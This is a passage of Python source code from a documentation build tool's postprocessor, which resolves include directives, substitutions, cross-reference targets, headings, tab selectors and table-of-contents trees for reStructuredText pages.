Dict[FileId, List[Diagnostic]]) -> None:\n self.pending_program: Optional[n.Target] = None\n self.diagnostics = diagnostics\n\n def reset(self, fileid_stack: FileIdStack, page: Page) -> None:\n self.pending_program = None\n\n def __call__(self, fileid_stack: FileIdStack, node: n.Node) -> None:\n if not isinstance(node, n.Target):\n return\n\n identifier = f\"{node.domain}:{node.name}\"\n if identifier == \"std:program\":\n self.pending_program = node\n elif identifier == \"std:option\":\n if not self.pending_program:\n line = node.start[0]\n self.diagnostics[fileid_stack.current].append(MissingOption(line))\n return\n program_target = next(\n self.pending_program.get_child_of_type(n.TargetIdentifier)\n )\n program_name_node = program_target.children[0]\n assert isinstance(program_name_node, n.Text)\n program_name = program_name_node.value\n new_identifiers: List[n.Node] = []\n for child in node.get_child_of_type(n.TargetIdentifier):\n child_ids = child.ids\n child_ids.extend(\n [f\"{program_name}.{child_id}\" for child_id in child_ids]\n )\n\n text_node = child.children[0]\n assert isinstance(text_node, n.Text)\n value = text_node.value\n text_node.value = f\"{program_name} {value}\"\n\n node.children.extend(new_identifiers)\n\n\nclass IncludeHandler:\n \"\"\"Iterate over all pages to find include directives. When found, replace their\n `children` property with the contents of the include file.\n Because the include contents are added to the tree on which the event parser is\n running, they will automatically be parsed and have their includes expanded, too.\"\"\"\n\n def __init__(\n self,\n diagnostics: Dict[FileId, List[Diagnostic]],\n slug_fileid_mapping: Dict[str, FileId],\n pages: Dict[FileId, Page],\n ) -> None:\n self.diagnostics = diagnostics\n self.slug_fileid_mapping = slug_fileid_mapping\n self.pages = pages\n\n def reset(self, fileid_stack: FileIdStack) -> None:\n pass\n\n @staticmethod\n def is_bound(node: n.Node, search_text: Optional[str]) -> bool:\n \"\"\"Helper function to determine if the given node contains specified start-after or end-before text.\n\n Note: For now, we are only splicing included files based on Comments and TargetIdentifier nodes.\n Comments have Text nodes as children; Labels have TargetIdentifiers as children.\"\"\"\n if isinstance(node, n.Comment):\n if node.children and isinstance(node.children[0], n.Text):\n comment_text = node.children[0].get_text()\n return search_text == comment_text\n elif isinstance(node, n.Target):\n # TODO: get_child_of_type\n if node.domain == \"std\" and node.name == \"label\":\n if node.children and isinstance(node.children[0], n.TargetIdentifier):\n target_identifier = node.children[0]\n if target_identifier.ids:\n return search_text in target_identifier.ids\n return False\n\n def bound_included_AST(\n self,\n nodes: MutableSequence[n.Node],\n start_after_text: Optional[str],\n end_before_text: Optional[str],\n ) -> Tuple[MutableSequence[n.Node], bool, bool]:\n \"\"\"Given an AST in the form of nodes, return a subgraph of that AST by removing nodes 'outside' of\n the bound formed by the nodes containing the start_after_text or end_before_text. In in-order traversal,\n a node is considered 'outside' the subgraph if it precedes and is not any ancestor of the start-after node,\n or if it succeeds and is not any ancestor of the end-before node.\"\"\"\n\n start_index, end_index = 0, len(nodes)\n any_start, any_end = False, False\n\n # For any given node: if the start_after node is within this node's subtree, do not include any\n # preceding siblings of this node in the resulting AST; if the end_before node is within this\n # node's subtree, then do not include any succeeding siblings of this node.\n for i, node in enumerate(nodes):\n has_start, has_end = False, False\n # Determine if this node itself (not a child node) contains a bound\n is_start = IncludeHandler.is_bound(node, start_after_text)\n is_end = IncludeHandler.is_bound(node, end_before_text)\n # Recursively search the child nodes for bounds\n if isinstance(node, n.Parent):\n children, has_start, has_end = self.bound_included_AST(\n node.children, start_after_text, end_before_text\n )\n node.children = children\n if is_start or has_start:\n any_start = True\n start_index = i\n if is_end or has_end:\n any_end = True\n end_index = i\n if start_index > end_index:\n raise Exception(\"start-after text should precede end-before text\")\n # Remove sibling nodes preceding and succeeding the nodes containing the bounds in their subtrees\n return nodes[start_index : end_index + 1], any_start, any_end\n\n def __call__(self, fileid_stack: FileIdStack, node: n.Node) -> None:\n def get_include_argument(node: n.Directive) -> str:\n \"\"\"Get filename of include\"\"\"\n argument_list = node.argument\n assert len(argument_list) > 0\n return argument_list[0].value\n\n if not isinstance(node, n.Directive) or not node.name == \"include\":\n return\n\n argument = get_include_argument(node)\n include_slug = clean_slug(argument)\n include_fileid = self.slug_fileid_mapping.get(include_slug)\n # Some `include` FileIds in the mapping include file extensions (.yaml) and others do not\n # This will likely be resolved by DOCSP-7159 https://jira.mongodb.org/browse/DOCSP-7159\n if include_fileid is None:\n include_slug = argument.strip(\"/\")\n include_fileid = self.slug_fileid_mapping.get(include_slug)\n\n # End if we can't find a file\n if include_fileid is None:\n return\n\n include_page = self.pages.get(include_fileid)\n assert include_page is not None\n ast = include_page.ast\n assert isinstance(ast, n.Parent)\n deep_copy_children: MutableSequence[n.Node] = [util.fast_deep_copy(ast)]\n\n # TODO: Move subgraphing implementation into parse layer, where we can\n # ideally take subgraph of the raw RST\n start_after_text = node.options.get(\"start-after\")\n end_before_text = node.options.get(\"end-before\")\n\n if start_after_text or end_before_text:\n line = node.span[0]\n any_start, any_end = False, False\n try:\n # Returns a subgraph of the AST based on text bounds\n deep_copy_children, any_start, any_end = self.bound_included_AST(\n deep_copy_children, start_after_text, end_before_text\n )\n except Exception as e:\n self.diagnostics[fileid_stack.current].append(\n InvalidInclude(str(e), line)\n )\n # Confirm that we found all specified text (with helpful diagnostic )message if not)\n msg = \"Please be sure your text is a comment or label. Search is case-sensitive.\"\n if start_after_text and not any_start:\n self.diagnostics[fileid_stack.current].append(\n InvalidInclude(\n f\"Could not find specified start-after text: '{start_after_text}'. {msg}\",\n line,\n )\n )\n if end_before_text and not any_end:\n self.diagnostics[fileid_stack.current].append(\n InvalidInclude(\n f\"Could not find specified end-before text: '{end_before_text}'. {msg}\",\n line,\n )\n )\n\n node.children = deep_copy_children\n\n\nclass NamedReferenceHandler:\n \"\"\"Identify non-anonymous hyperlinks (i.e. those defined with a single underscore) and save them according to {name: url}.\n Attach the associated URL to any uses of this named reference.\n \"\"\"\n\n def __init__(self, diagnostics: Dict[FileId, List[Diagnostic]]) -> None:\n self.named_references: Dict[str, str] = {}\n self.diagnostics = diagnostics\n\n def __call__(self, fileid_stack: FileIdStack, node: n.Node) -> None:\n if not isinstance(node, n.NamedReference):\n return\n\n self.named_references[node.refname] = node.refuri\n\n def populate(self, fileid_stack: FileIdStack, node: n.Node) -> None:\n if not isinstance(node, n.Reference):\n return\n\n if node.refuri:\n # Node is already populated with url; nothing to do\n return\n\n refuri = self.named_references.get(node.refname)\n if refuri is None:\n line = node.span[0]\n self.diagnostics[fileid_stack.current].append(\n TargetNotFound(\"extlink\", node.refname, line)\n )\n return\n\n node.refuri = refuri\n\n\nclass ContentsHandler:\n \"\"\"Identify all headings on a given page. If a contents directive appears on the page, save list of headings as a page-level option.\"\"\"\n\n class HeadingData(NamedTuple):\n depth: int\n id: str\n title: Sequence[n.InlineNode]\n\n def __init__(self, diagnostics: Dict[FileId, List[Diagnostic]]) -> None:\n self.contents_depth = sys.maxsize\n self.current_depth = 0\n self.has_contents_directive = False\n self.headings: List[ContentsHandler.HeadingData] = []\n self.diagnostics = diagnostics\n\n def reset(self, fileid_stack: FileIdStack, page: Page) -> None:\n self.contents_depth = sys.maxsize\n self.current_depth = 0\n self.has_contents_directive = False\n self.headings = []\n\n def finalize_headings(self, fileid_stack: FileIdStack, page: Page) -> None:\n if not self.has_contents_directive:\n return\n\n if isinstance(page.ast, n.Root):\n heading_list = [\n {\n \"depth\": h.depth,\n \"id\": h.id,\n \"title\": [node.serialize() for node in h.title],\n }\n for h in self.headings\n if h.depth - 1 <= self.contents_depth\n ]\n if heading_list:\n page.ast.options[\"headings\"] = heading_list\n\n def enter_section(self, fileid_stack: FileIdStack, node: n.Node) -> None:\n if isinstance(node, n.Section):\n self.current_depth += 1\n\n def exit_section(self, fileid_stack: FileIdStack, node: n.Node) -> None:\n if isinstance(node, n.Section):\n self.current_depth -= 1\n\n def __call__(self, fileid_stack: FileIdStack, node: n.Node) -> None:\n if isinstance(node, n.Directive) and node.name == \"contents\":\n if self.has_contents_directive:\n self.diagnostics[fileid_stack.current].append(\n DuplicateDirective(node.name, node.start[0])\n )\n return\n\n self.has_contents_directive = True\n self.contents_depth = int(node.options.get(\"depth\", sys.maxsize))\n return\n\n if self.current_depth - 1 > self.contents_depth:\n return\n\n # Omit title headings (depth = 1) from heading list\n if isinstance(node, n.Heading) and self.current_depth > 1:\n self.headings.append(\n ContentsHandler.HeadingData(self.current_depth, node.id, node.children)\n )\n\n\nclass TabsSelectorHandler:\n def __init__(self, diagnostics: Dict[FileId, List[Diagnostic]]) -> None:\n self.selectors: Dict[str, List[Dict[str, MutableSequence[n.Text]]]] = {}\n self.diagnostics = diagnostics\n\n def reset(self, fileid_stack: FileIdStack, page: Page) -> None:\n self.selectors = {}\n\n def finalize_tabsets(self, fileid_stack: FileIdStack, page: Page) -> None:\n if len(self.selectors) == 0:\n return\n\n for tabset_name, tabsets in self.selectors.items():\n if len(tabsets) == 0:\n # Warn if tabs-selector is used without corresponding tabset\n self.diagnostics[fileid_stack.current].append(ExpectedTabs(0))\n return\n if not all(len(t) == len(tabsets[0]) for t in tabsets):\n # If all tabsets are not the same length, identify tabs that do not appear in every tabset\n tabset_sets = [set(t.keys()) for t in tabsets]\n union = set.union(*tabset_sets)\n intersection = set.intersection(*tabset_sets)\n error_tabs = union - intersection\n self.diagnostics[fileid_stack.current].append(MissingTab(error_tabs, 0))\n\n if isinstance(page.ast, n.Root):\n if not page.ast.options.get(\"selectors\"):\n page.ast.options[\"selectors\"] = {}\n\n assert isinstance(page.ast.options[\"selectors\"], Dict)\n page.ast.options[\"selectors\"][tabset_name] = {\n tabid: [node.serialize() for node in title]\n for tabid, title in tabsets[0].items()\n }\n\n def __call__(self, fileid_stack: FileIdStack, node: n.Node) -> None:\n if not isinstance(node, n.Directive):\n return\n\n if node.name == \"tabs-pillstrip\" or node.name == \"tabs-selector\":\n if len(node.argument) == 0:\n return\n\n tabset_name: str = node.argument[0].get_text()\n # Handle naming discrepancy between .. tabs-pillstrip:: languages and .. tabs-drivers::\n if tabset_name == \"languages\":\n tabset_name = \"drivers\"\n\n # Avoid overwriting previously seen tabsets if another tabs-pillstrip directive is encountered\n if tabset_name in self.selectors:\n self.diagnostics[fileid_stack.current].append(\n DuplicateDirective(node.name, node.start[0])\n )\n return\n\n self.selectors[tabset_name] = []\n return\n\n if len(self.selectors) == 0 or node.name != \"tabs\":\n return\n\n tabset_name = node.options.get(\"tabset\", \"\")\n if tabset_name in self.selectors:\n tabs = {\n tab.options[\"tabid\"]: tab.argument\n for tab in node.get_child_of_type(n.Directive)\n if tab.name == \"tab\" and \"tabid\" in tab.options\n }\n self.selectors[tabset_name].append(tabs)\n\n\nclass TargetHandler:\n def __init__(self, targets: TargetDatabase) -> None:\n self.target_counter: typing.Counter[str] = collections.Counter()\n self.targets = targets\n\n def reset(self, fileid_stack: FileIdStack, page: Page) -> None:\n self.target_counter.clear()\n\n def __call__(self, fileid_stack: FileIdStack, node: n.Node) -> None:\n if not isinstance(node, n.Target):\n return\n\n # Frankly, this is silly. We just pick the longest identifier. This is arbitrary,\n # and we can consider this behavior implementation-defined to be changed later if needed.\n # It just needs to be something consistent.\n identifiers = list(node.get_child_of_type(n.TargetIdentifier))\n candidates = [\n max(identifier.ids, key=len) for identifier in identifiers if identifier.ids\n ]\n\n if not candidates:\n return\n\n chosen_id = max(candidates, key=len)\n chosen_html_id = f\"{node.domain}-{node.name}-{util.make_html5_id(chosen_id)}\"\n\n # Disambiguate duplicate IDs, should they occur.\n counter = self.target_counter[chosen_html_id]\n if counter > 0:\n chosen_html_id += f\"-{counter}\"\n self.target_counter[chosen_html_id] += 1\n node.html_id = chosen_html_id\n\n for target_node in identifiers:\n if not target_node.children:\n title: List[n.InlineNode] = []\n else:\n title = list(target_node.children)\n\n target_ids = target_node.ids\n self.targets.define_local_target(\n node.domain,\n node.name,\n target_ids,\n fileid_stack.root,\n title,\n chosen_html_id,\n )\n\n\nclass HeadingHandler:\n \"\"\"Construct a slug-title mapping of all pages in property, and rewrite\n heading IDs so as to be unique.\"\"\"\n\n def __init__(self, targets: TargetDatabase) -> None:\n self.heading_counter: typing.Counter[str] = collections.Counter()\n self.targets = targets\n self.slug_title_mapping: Dict[str, Sequence[n.InlineNode]] = {}\n\n def reset(self, fileid_stack: FileIdStack, page: Page) -> None:\n self.heading_counter.clear()\n\n def get_title(self, slug: str) -> Optional[Sequence[n.InlineNode]]:\n return self.slug_title_mapping.get(slug)\n\n def __contains__(self, slug: str) -> bool:\n return slug in self.slug_title_mapping\n\n def __call__(self, fileid_stack: FileIdStack, node: n.Node) -> None:\n if not isinstance(node, n.Heading):\n return\n\n counter = self.heading_counter[node.id]\n self.heading_counter[node.id] += 1\n if counter > 0:\n node.id += f\"-{counter}\"\n\n slug = fileid_stack.root.without_known_suffix\n\n # Save the first heading we encounter to the slug title mapping\n if slug not in self.slug_title_mapping:\n self.targets.define_local_target(\n \"std\",\n \"doc\",\n (slug,),\n fileid_stack.root,\n node.children,\n util.make_html5_id(node.id),\n )\n self.slug_title_mapping[slug] = node.children\n self.targets.define_local_target(\n \"std\",\n \"doc\",\n (fileid_stack.root.without_known_suffix,),\n fileid_stack.root,\n node.children,\n util.make_html5_id(node.id),\n )\n\n\nclass IAHandler:\n \"\"\"Identify IA directive on a page and save a list of its entries as a page-level option.\"\"\"\n\n class IAData(NamedTuple):\n title: Sequence[n.InlineNode]\n url: Optional[str]\n slug: Optional[str]\n project_name: Optional[str]\n primary: Optional[bool]\n\n def serialize(self) -> n.SerializedNode:\n result: n.SerializedNode = {\n \"title\": [node.serialize() for node in self.title],\n }\n\n if self.project_name:\n result[\"project_name\"] = self.project_name\n if self.slug:\n result[\"slug\"] = self.slug\n if self.url:\n result[\"url\"] = self.url\n if self.primary is not None:\n result[\"primary\"] = self.primary\n\n return result\n\n def __init__(\n self,\n diagnostics: Dict[FileId, List[Diagnostic]],\n heading_handler: HeadingHandler,\n ) -> None:\n self.ia: List[IAHandler.IAData] = []\n self.diagnostics = diagnostics\n self.heading_handler = heading_handler\n\n def reset(self, fileid_stack: FileIdStack, page: Page) -> None:\n self.ia = []\n\n def __call__(self, fileid_stack: FileIdStack, node: n.Node) -> None:\n if (\n not isinstance(node, n.Directive)\n or not node.name == \"ia\"\n or not node.domain == \"\"\n ):\n return\n\n if self.ia:\n self.diagnostics[fileid_stack.current].append(\n DuplicateDirective(node.name, node.start[0])\n )\n return\n\n for entry in node.get_child_of_type(n.Directive):\n if entry.name != \"entry\":\n line = node.span[0]\n self.diagnostics[fileid_stack.current].append(\n InvalidChild(entry.name, \"ia\", \"entry\", line)\n )\n continue\n\n if not entry.options.get(\"url\"):\n self.diagnostics[fileid_stack.current].append(\n InvalidIAEntry(\n \"IA entry directives must include the :url: option\",\n node.span[0],\n )\n )\n continue\n\n parsed = urllib.parse.urlparse(entry.options.get(\"url\"))\n if parsed.scheme:\n url = entry.options.get(\"url\")\n slug = None\n else:\n url = None\n slug = entry.options.get(\"url\")\n\n if slug and not self.heading_handler.get_title(clean_slug(slug)):\n self.diagnostics[fileid_stack.current].append(\n MissingTocTreeEntry(slug, node.span[0])\n )\n continue\n\n title: Sequence[n.InlineNode] = []\n if len(entry.argument) > 0:\n title = entry.argument\n elif slug:\n title = self.heading_handler.get_title(clean_slug(slug)) or []\n\n project_name = entry.options.get(\"project-name\")\n if project_name and not url:\n self.diagnostics[fileid_stack.current].append(\n InvalidIAEntry(\n \"IA entry directives with :project-name: option must include :url: option\",\n node.span[0],\n )\n )\n continue\n\n if url and not title:\n self.diagnostics[fileid_stack.current].append(\n InvalidIAEntry(\n \"IA entries to external URLs must include titles\",\n node.span[0],\n )\n )\n continue\n\n self.ia.append(\n IAHandler.IAData(\n title,\n url,\n slug,\n project_name,\n bool(entry.options.get(\"primary\", False)) if project_name else None,\n )\n )\n\n def finalize_ia(self, fileid_stack: FileIdStack, page: Page) -> None:\n if not self.ia:\n return\n\n if isinstance(page.ast, n.Root):\n page.ast.options[\"ia\"] = [entry.serialize() for entry in self.ia]\n\n\nclass Postprocessor:\n \"\"\"Handles all postprocessing operations on parsed AST files.\n\n The only method that should be called on an instance of Postprocessor is run(). This method\n handles calling all other methods and ensures that parse operations are run in the correct order.\"\"\"\n\n def __init__(self, project_config: ProjectConfig, targets: TargetDatabase) -> None:\n self.project_config = project_config\n self.toctree: Dict[str, SerializableType] = {}\n self.pages: Dict[FileId, Page] = {}\n self.pending_targets: List[n.Node] = []\n self.targets = targets\n self.substitution_definitions: Dict[str, MutableSequence[n.InlineNode]] = {}\n self.unreplaced_nodes: List[Tuple[n.SubstitutionReference, int]] = []\n self.seen_definitions: Optional[Set[str]] = None\n self.toc_landing_pages = [\n clean_slug(slug) for slug in project_config.toc_landing_pages\n ]\n self.pending_program: Optional[SerializableType] = None\n\n def run(\n self, pages: Dict[FileId, Page]\n ) -> Tuple[Dict[str, SerializableType], Dict[FileId, List[Diagnostic]]]:\n \"\"\"Run all postprocessing operations and return a dictionary containing the metadata document to be saved.\"\"\"\n if not pages:\n return {}, {}\n\n self.pages = pages\n self.build_slug_fileid_mapping()\n self.diagnostics: Dict[FileId, List[Diagnostic]] = defaultdict(list)\n\n include_handler = IncludeHandler(\n self.diagnostics, self.slug_fileid_mapping, self.pages\n )\n self.run_event_parser([(EventParser.OBJECT_START_EVENT, include_handler)])\n\n self.handle_substitutions()\n\n option_handler = ProgramOptionHandler(self.diagnostics)\n tabs_selector_handler = TabsSelectorHandler(self.diagnostics)\n contents_handler = ContentsHandler(self.diagnostics)\n self.heading_handler = HeadingHandler(self.targets)\n\n self.run_event_parser(\n [\n (EventParser.OBJECT_START_EVENT, self.heading_handler),\n (EventParser.OBJECT_START_EVENT, self.add_titles_to_label_targets),\n (\n EventParser.OBJECT_START_EVENT,\n option_handler,\n ),\n (EventParser.OBJECT_START_EVENT, tabs_selector_handler),\n (EventParser.OBJECT_START_EVENT, contents_handler.enter_section),\n (EventParser.OBJECT_START_EVENT, contents_handler),\n (EventParser.OBJECT_END_EVENT, contents_handler.exit_section),\n ],\n [\n (EventParser.PAGE_START_EVENT, option_handler.reset),\n (EventParser.PAGE_START_EVENT, tabs_selector_handler.reset),\n (EventParser.PAGE_START_EVENT, contents_handler.reset),\n (EventParser.PAGE_END_EVENT, contents_handler.finalize_headings),\n (EventParser.PAGE_END_EVENT, tabs_selector_handler.finalize_tabsets),\n (EventParser.PAGE_END_EVENT, self.heading_handler.reset),\n ],\n )\n\n target_handler = TargetHandler(self.targets)\n named_reference_handler = NamedReferenceHandler(self.diagnostics)\n ia_handler = IAHandler(self.diagnostics, self.heading_handler)\n self.run_event_parser(\n [\n (EventParser.OBJECT_START_EVENT, target_handler),\n (EventParser.OBJECT_START_EVENT, named_reference_handler),\n (EventParser.OBJECT_START_EVENT, ia_handler),\n ],\n [\n (EventParser.PAGE_START_EVENT, target_handler.reset),\n (EventParser.PAGE_START_EVENT, ia_handler.reset),\n (EventParser.PAGE_END_EVENT, ia_handler.finalize_ia),\n ],\n )\n self.run_event_parser(\n [\n (EventParser.OBJECT_START_EVENT, self.handle_refs),\n (EventParser.OBJECT_START_EVENT, named_reference_handler.populate),\n ]\n )\n document = self.generate_metadata()\n\n return document, self.diagnostics\n\n def generate_metadata(self) -> n.SerializedNode:\n document: Dict[str, SerializableType] = {}\n document[\"title\"] = self.project_config.title\n if self.project_config.deprecated_versions:\n document[\"deprecated_versions\"] = self.project_config.deprecated_versions\n # Update metadata document with key-value pairs defined in event parser\n document[\"slugToTitle\"] = {\n k: [node.serialize() for node in v]\n for k, v in self.heading_handler.slug_title_mapping.items()\n }\n # Run postprocessing operations related to toctree and append to metadata document.\n # If iatree is found, use it to generate breadcrumbs and parent paths and save it to metadata as well.\n iatree = self.build_iatree()\n toctree = self.build_toctree()\n if iatree and toctree.get(\"children\"):\n self.diagnostics[FileId(\"index.txt\")].append(InvalidTocTree(0))\n\n tree = iatree or toctree\n document.update(\n {\n \"toctree\": toctree,\n \"toctreeOrder\": self.toctree_order(tree),\n \"parentPaths\": self.breadcrumbs(tree),\n }\n )\n\n if iatree:\n document[\"iatree\"] = iatree\n\n return document\n\n def _get_page_from_slug(self, current_page: Page, slug: str) -> Optional[Page]:\n relative, _ = util.reroot_path(\n FileId(slug), current_page.source_path, self.project_config.source_path\n )\n\n try:\n fileid_with_ext = self.slug_fileid_mapping[relative.as_posix()]\n except KeyError:\n return None\n return self.pages.get(fileid_with_ext)\n\n def run_event_parser(\n self,\n node_listeners: Iterable[Tuple[str, Callable[[FileIdStack, n.Node], None]]],\n page_listeners: Iterable[Tuple[str, Callable[[FileIdStack, Page], None]]] = (),\n ) -> None:\n event_parser = EventParser()\n for event, node_listener in node_listeners:\n event_parser.add_event_listener(event, node_listener)\n\n for event, page_listener in page_listeners:\n event_parser.add_event_listener(event, page_listener)\n\n event_parser.consume(\n (k, v) for k, v in self.pages.items() if k.suffix == \".txt\"\n )\n\n def _attach_doc_title(self, fileid_stack: FileIdStack, node: n.RefRole) -> None:\n target_fileid = None if node.fileid is None else node.fileid[0]\n if not target_fileid:\n line = node.span[0]\n self.diagnostics[fileid_stack.current].append(\n ExpectedPathArg(node.name, line)\n )\n return\n\n relative, _ = util.reroot_path(\n FileId(target_fileid), fileid_stack.root, self.project_config.source_path\n )\n slug = clean_slug(relative.as_posix())\n title = self.heading_handler.get_title(slug)\n\n if not title:\n line = node.span[0]\n self.diagnostics[fileid_stack.current].append(\n UnnamedPage(target_fileid, line)\n )\n return\n\n node.children = [deepcopy(node) for node in title]\n\n def handle_refs(self, fileid_stack: FileIdStack, node: n.Node) -> None:\n \"\"\"When a node of type ref_role is encountered, ensure that it references a valid target.\n\n If so, append the full URL to the AST node. If not, throw an error.\n \"\"\"\n if not isinstance(node, n.RefRole):\n return\n key = f\"{node.domain}:{node.name}\"\n\n if key == \"std:doc\":\n if not node.children:\n # If title is not explicitly given, search slug-title mapping for the page's title\n self._attach_doc_title(fileid_stack, node)\n return\n\n key += f\":{node.target}\"\n\n # Add title and link target to AST\n target_candidates = self.targets[key]\n if not target_candidates:\n # insert title and raise diagnostic\n line = node.span[0]\n target_dict = specparser.SPEC.rstobject\n target_key = f\"{node.domain}:{node.name}\"\n title = node.target\n # abstract title from node's target to insert into new text node\n if target_key in target_dict and target_dict[target_key].prefix:\n title = title.replace(f\"{target_dict[target_key].prefix}.\", \"\")\n text_node = n.Text((line,), title)\n injection_candidate = get_title_injection_candidate(node)\n\n if injection_candidate is not None:\n injection_candidate.children = [text_node]\n\n self.diagnostics[fileid_stack.current].append(\n TargetNotFound(node.name, node.target, line)\n )\n return\n\n if len(target_candidates) > 1:\n # Try to prune down the options\n target_candidates = self.attempt_disambugation(\n fileid_stack.root, target_candidates\n )\n\n if len(target_candidates) > 1:\n line = node.span[0]\n candidate_descriptions = []\n for candidate in target_candidates:\n if isinstance(candidate, TargetDatabase.InternalResult):\n candidate_descriptions.append(candidate.result[0])\n else:\n candidate_descriptions.append(candidate.url)\n\n self.diagnostics[fileid_stack.current].append(\n AmbiguousTarget(node.name, node.target, candidate_descriptions, line)\n )\n\n # Choose the most recently-defined target candidate if it is ambiguous\n result = target_candidates[-1]\n node.target = result.canonical_target_name\n if isinstance(result, TargetDatabase.InternalResult):\n node.fileid = result.result\n else:\n node.url = result.url\n injection_candidate = get_title_injection_candidate(node)\n # If there is no explicit title given, use the target's title\n if injection_candidate is not None:\n cloned_title_nodes: MutableSequence[n.Node] = list(\n deepcopy(node) for node in result.title\n )\n for title_node in cloned_title_nodes:\n deep_copy_position(node, title_node)\n\n # Label abbreviation is underspecified. Good luck!\n if \"~\" in node.flag and cloned_title_nodes:\n node_to_abbreviate = cloned_title_nodes[0]\n if isinstance(node_to_abbreviate, n.Text):\n index = node_to_abbreviate.value.rfind(\".\")\n new_value = node_to_abbreviate.value[index + 1 :].strip()\n\n if new_value:\n node_to_abbreviate.value = new_value\n\n injection_candidate.children = cloned_title_nodes\n\n def attempt_disambugation(\n self, fileid: FileId, candidates: Sequence[TargetDatabase.Result]\n ) -> Sequence[TargetDatabase.Result]:\n \"\"\"Given multiple possible targets we can link to, attempt to narrow down the\n list to one probably-intended target under a set of narrow circumstances.\"\"\"\n\n # If there is a single local candidate, choose that.\n local_candidates: List[TargetDatabase.InternalResult] = [\n candidate\n for candidate in candidates\n if isinstance(candidate, TargetDatabase.InternalResult)\n ]\n if len(local_candidates) == 1:\n return [local_candidates[0]]\n\n # If there is a target defined in the current context, use that.\n current_fileid_candidates = [\n candidate\n for candidate in local_candidates\n if candidate.result[0] == fileid.without_known_suffix\n ]\n if len(current_fileid_candidates) == 1:\n return [current_fileid_candidates[0]]\n\n return candidates\n\n def handle_substitutions(self) -> None:\n \"\"\"Find and replace substitutions throughout project\"\"\"\n self.run_event_parser(\n [\n (EventParser.OBJECT_START_EVENT, self.replace_substitutions),\n (EventParser.OBJECT_END_EVENT, self.reset_seen_definitions),\n ],\n [(EventParser.PAGE_END_EVENT, self.finalize_substitutions)],\n )\n\n def replace_substitutions(self, fileid_stack: FileIdStack, node: n.Node) -> None:\n \"\"\"When a substitution is defined, add it to the page's index.\n\n When a substitution is referenced, populate its children if possible.\n If not, save this node to be populated at the end of the page.\n \"\"\"\n\n try:\n line = node.span[0]\n if isinstance(node, n.SubstitutionDefinition):\n self.substitution_definitions[node.name] = node.children\n self.seen_definitions = set()\n elif isinstance(node, n.SubstitutionReference):\n # Get substitution from page. If not found, attempt to source from snooty.toml. Otherwise, save substitution to be populated at the end of page\n substitution = self.substitution_definitions.get(\n node.name\n ) or self.project_config.substitution_nodes.get(node.name)\n\n if (\n self.seen_definitions is not None\n and node.name in self.seen_definitions\n ):\n # Catch circular substitution\n del self.substitution_definitions[node.name]\n node.children = []\n self.diagnostics[fileid_stack.current].append(\n SubstitutionRefError(\n f'Circular substitution definition referenced: \"{node.name}\"',\n line,\n )\n )\n elif substitution is not None:\n node.children = substitution\n else:\n # Save node in order to populate it at the end of the page\n self.unreplaced_nodes.append((node, line))\n\n if self.seen_definitions is not None:\n self.seen_definitions.add(node.name)\n except KeyError:\n # If node does not contain \"name\" field, it is a duplicate substitution definition.\n # An error has already been thrown for this on parse, so pass.\n pass\n\n def finalize_substitutions(self, fileid_stack: FileIdStack, page: Page) -> None:\n \"\"\"Attempt to populate any yet-unresolved substitutions (substitutions defined after usage) .\n\n Clear definitions and unreplaced nodes for the next page.\n \"\"\"\n for node, line in self.unreplaced_nodes:\n substitution = self.substitution_definitions.get(node.name)\n if substitution is not None:\n node.children = substitution\n else:\n self.diagnostics[fileid_stack.current].append(\n SubstitutionRefError(\n f'Substitution reference could not be replaced: \"|{node.name}|\"',\n line,\n )\n )\n\n self.substitution_definitions = {}\n self.unreplaced_nodes = []\n\n def reset_seen_definitions(self, fileid_stack: FileIdStack, node: n.Node) -> None:\n if isinstance(node, n.SubstitutionDefinition):\n self.seen_definitions = None\n\n def add_titles_to_label_targets(\n self, fileid_stack: FileIdStack, node: n.Node\n ) -> None:\n if not isinstance(node, (n.Target, n.Section, n.TargetIdentifier)):\n self.pending_targets = []\n\n if isinstance(node, n.Target) and node.domain == \"std\" and node.name == \"label\":\n self.pending_targets.extend(node.children)\n elif isinstance(node, n.Section):\n for target in self.pending_targets:\n heading = next(node.get_child_of_type(n.Heading), None)\n if heading is not None:\n assert isinstance(target, n.Parent)\n target.children = heading.children\n self.pending_targets = []\n\n def build_slug_fileid_mapping(self) -> None:\n \"\"\"Construct a {slug: fileid} mapping so that we can retrieve the full file name\n given a slug. We cannot use the with_suffix method since the type of the slug\n in find_toctree_nodes(...) is string rather than FileId.\"\"\"\n fileid_dict: Dict[str, FileId] = {}\n for fileid in self.pages:\n slug = fileid.without_known_suffix\n fileid_dict[slug] = fileid\n self.slug_fileid_mapping = fileid_dict\n\n def build_iatree(self) -> Dict[str, SerializableType]:\n starting_page = self.pages.get(FileId(\"index.txt\"))\n\n if not starting_page:\n return {}\n if not isinstance(starting_page.ast, n.Root):\n return {}\n if \"ia\" not in starting_page.ast.options:\n return {}\n\n title: Sequence[n.InlineNode] = self.heading_handler.get_title(\"index\") or [\n n.Text((0,), self.project_config.title)\n ]\n root: Dict[str, SerializableType] = {\n \"title\": [node.serialize() for node in title],\n \"slug\": \"/\",\n \"children\": [],\n }\n self.iterate_ia(starting_page, root)\n return root\n\n def iterate_ia(self, page: Page, result: Dict[str, SerializableType]) -> None:\n \"\"\"Construct a tree of similar structure to toctree. Starting from root, identify ia object on page and recurse on its entries to build a tree. Includes all potential properties of an entry including title, URI, project name, and primary status.\"\"\"\n if not isinstance(page.ast, n.Root):\n return\n\n ia = page.ast.options.get(\"ia\")\n if not isinstance(ia, List):\n return\n for entry in ia:\n curr: Dict[str, SerializableType] = {**entry, \"children\": []}\n if isinstance(result[\"children\"], List):\n result[\"children\"].append(curr)\n\n slug = curr.get(\"slug\")\n if isinstance(slug, str):\n child = self._get_page_from_slug(page, slug)\n if child:\n self.iterate_ia(child, curr)\n\n def build_toctree(self) -> Dict[str, SerializableType]:\n \"\"\"Build property toctree\"\"\"\n\n # The toctree must begin at either `contents.txt` or `index.txt`.\n # Generally, repositories will have one or the other; but, if a repo has both,\n # the starting point will be `contents.txt`.\n candidates = (FileId(\"contents.txt\"), FileId(\"index.txt\"))\n starting_fileid = next(\n (candidate for candidate in candidates if candidate in self.pages), None\n )\n if starting_fileid is None:\n return {}\n\n # Build the toctree\n root: Dict[str, SerializableType] = {\n \"title\": [n.Text((0,), self.project_config.title).serialize()],\n \"slug\": \"/\",\n \"children\": [],\n }\n ast = self.pages[starting_fileid].ast\n\n self.find_toctree_nodes(starting_fileid, ast, root, {starting_fileid})\n\n self.toctree = root\n return root\n\n def find_toctree_nodes(\n self,\n fileid: FileId,\n ast: n.Node,\n node: Dict[str, Any],\n visited_file_ids: Set[FileId] = set(),\n ) -> 